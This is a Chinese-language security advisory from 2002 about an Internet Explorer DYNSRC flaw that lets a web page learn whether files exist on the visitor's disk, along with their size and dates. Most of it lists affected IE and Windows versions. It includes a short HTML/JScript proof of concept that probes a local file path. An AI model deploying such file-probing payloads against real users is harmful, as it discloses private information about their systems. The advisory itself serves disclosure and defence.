Microsoft Internet Explorer DYNSRC文件信息泄露问题

发布时间：2002-03-30
更新时间：2002-03-30
严重程度：中
威胁程度：用户敏感信息泄露
错误类型：访问验证错误
利用方式：服务器模式

BUGTRAQ ID：4371

受影响系统

Microsoft Internet Explorer 5.01
   + Microsoft Windows 2000 Advanced Server 0.0
   + Microsoft Windows 2000 Datacenter Server 0.0
   + Microsoft Windows 2000 Professional 0.0
   + Microsoft Windows 2000 Server 0.0
   - Microsoft Windows 95 0.0
   - Microsoft Windows 98 0.0
   - Microsoft Windows 98SE 0.0
   - Microsoft Windows NT Enterprise Server 4.0SP3
   - Microsoft Windows NT Enterprise Server 4.0SP4
   - Microsoft Windows NT Enterprise Server 4.0SP5
   - Microsoft Windows NT Enterprise Server 4.0SP6
   - Microsoft Windows NT Enterprise Server 4.0SP6a
   - Microsoft Windows NT Server 4.0SP3
   - Microsoft Windows NT Server 4.0SP4
   - Microsoft Windows NT Server 4.0SP5
   - Microsoft Windows NT Server 4.0SP6
   - Microsoft Windows NT Server 4.0SP6a
   - Microsoft Windows NT Terminal Server 4.0SP3
   - Microsoft Windows NT Terminal Server 4.0SP4
   - Microsoft Windows NT Terminal Server 4.0SP5
   - Microsoft Windows NT Terminal Server 4.0SP6
   - Microsoft Windows NT Terminal Server 4.0SP6a
   - Microsoft Windows NT Workstation 4.0SP3
   - Microsoft Windows NT Workstation 4.0SP4
   - Microsoft Windows NT Workstation 4.0SP5
   - Microsoft Windows NT Workstation 4.0SP6
   - Microsoft Windows NT Workstation 4.0SP6a
Microsoft Internet Explorer 5.0
   - Microsoft Windows 2000 Workstation 0.0
   - Microsoft Windows 2000 Workstation 0.0SP1
   - Microsoft Windows 2000 Workstation 0.0SP2
   - Microsoft Windows 95 0.0
   - Microsoft Windows 98 0.0
   + Microsoft Windows 98SE 0.0
   - Microsoft Windows NT 4.0SP3
   - Microsoft Windows NT 4.0SP4
   - Microsoft Windows NT 4.0SP5
   - Microsoft Windows NT 4.0SP6
   - Microsoft Windows NT 4.0SP6a
Microsoft Internet Explorer 5.0.1SP2
   - Microsoft Windows 2000 Workstation 0.0
   - Microsoft Windows 2000 Workstation 0.0SP1
   - Microsoft Windows 2000 Workstation 0.0SP2
   - Microsoft Windows 95 0.0
   - Microsoft Windows 98 0.0
   - Microsoft Windows NT 4.0SP3
   - Microsoft Windows NT 4.0SP4
   - Microsoft Windows NT 4.0SP5
   - Microsoft Windows NT 4.0SP6
   - Microsoft Windows NT 4.0SP6a
Microsoft Internet Explorer 5.0.1SP1
   - Microsoft Windows 2000 Workstation 0.0
   - Microsoft Windows 2000 Workstation 0.0SP1
   - Microsoft Windows 2000 Workstation 0.0SP2
   - Microsoft Windows 95 0.0
   - Microsoft Windows 98 0.0
   - Microsoft Windows NT 4.0SP3
   - Microsoft Windows NT 4.0SP4
   - Microsoft Windows NT 4.0SP5
   - Microsoft Windows NT 4.0SP6
   - Microsoft Windows NT 4.0SP6a
Microsoft Internet Explorer 5.5SP2
   - Microsoft Windows 2000 Terminal Services 0.0
   - Microsoft Windows 2000 Workstation 0.0
   - Microsoft Windows 2000 Workstation 0.0SP1
   - Microsoft Windows 2000 Workstation 0.0SP2
   - Microsoft Windows 95 0.0
   - Microsoft Windows 98 0.0
   - Microsoft Windows 98SE 0.0
   - Microsoft Windows ME 0.0
   - Microsoft Windows NT 4.0SP3
   - Microsoft Windows NT 4.0SP4
   - Microsoft Windows NT 4.0SP5
   - Microsoft Windows NT 4.0SP6
   - Microsoft Windows NT 4.0SP6a
   - Microsoft Windows NT Enterprise Server 4.0
   - Microsoft Windows NT Terminal Server 4.0
Microsoft Internet Explorer 5.5SP1
   - Microsoft Windows 2000 Workstation 0.0
   - Microsoft Windows 2000 Workstation 0.0SP1
   - Microsoft Windows 2000 Workstation 0.0SP2
   - Microsoft Windows 95 0.0
   - Microsoft Windows 98 0.0
   - Microsoft Windows NT 4.0SP3
   - Microsoft Windows NT 4.0SP4
   - Microsoft Windows NT 4.0SP5
   - Microsoft Windows NT 4.0SP6
   - Microsoft Windows NT 4.0SP6a
Microsoft Internet Explorer 5.5
   - Microsoft Windows 2000 Advanced Server 0.0
   - Microsoft Windows 2000 Advanced Server 0.0SP1
   - Microsoft Windows 2000 Advanced Server 0.0SP2
   - Microsoft Windows 2000 Datacenter Server 0.0
   - Microsoft Windows 2000 Datacenter Server 0.0SP1
   - Microsoft Windows 2000 Datacenter Server 0.0SP2
   - Microsoft Windows 2000 Professional 0.0
   - Microsoft Windows 2000 Professional 0.0SP1
   - Microsoft Windows 2000 Professional 0.0SP2
   - Microsoft Windows 2000 Server 0.0
   - Microsoft Windows 2000 Server 0.0SP1
   - Microsoft Windows 2000 Server 0.0SP2
   - Microsoft Windows 2000 Terminal Services 0.0
   - Microsoft Windows 2000 Terminal Services 0.0SP1
   - Microsoft Windows 2000 Terminal Services 0.0SP2
   - Microsoft Windows 95 0.0
   - Microsoft Windows 98 0.0
   + Microsoft Windows ME 0.0
   - Microsoft Windows NT 4.0SP3
   - Microsoft Windows NT 4.0SP4
   - Microsoft Windows NT 4.0SP5
   - Microsoft Windows NT 4.0SP6
   - Microsoft Windows NT 4.0SP6a
Microsoft Internet Explorer 6.0
   - Microsoft Windows 2000 Workstation 0.0
   - Microsoft Windows 2000 Workstation 0.0SP1
   - Microsoft Windows 2000 Workstation 0.0SP2
   - Microsoft Windows 98 0.0
   - Microsoft Windows 98SE 0.0
   - Microsoft Windows ME 0.0
   - Microsoft Windows NT 4.0SP6a

详细描述
Microsoft Internet Explorer存在安全漏洞可以允许远程攻击者获得目标系统上的已知文件。

问题存在与DYNSRC属性的实现上，如果成功利用，IE会从图象<img>元素中返回数据，包括日期建立，文件大小，最后修改日期等信息。

测试代码
<img dynsrc="file://c:/test.txt" id="oFile">
<script language="jscript" defer>
setTimeout(
        function () {
                alert(
                        oFile.fileSize>-1 ?
                                "File exists!\n\n"+
                                "Size: "+oFile.fileSize+" bytes.\n"+
                                "Created: "+oFile.fileCreatedDate+".\n"+
                                "Modified: "+oFile.fileModifiedDate+".\n"+
                                "Updated: "+oFile.fileUpdatedDate+"."
                        :
                                "File does not exist."
                );
        },
        250
);
</script>

GreyMagic Software <security@greymagic.com>提供一个动态演示站点：

http://security.greymagic.com/adv/gm003-ie/.

解决方案
尚无

相关信息
GreyMagic Software <security@greymagic.com>
参考：http://online.securityfocus.com/archive/1/264343

最近严重漏洞

Microsoft Internet Explorer DYNSRC文件信息泄露问题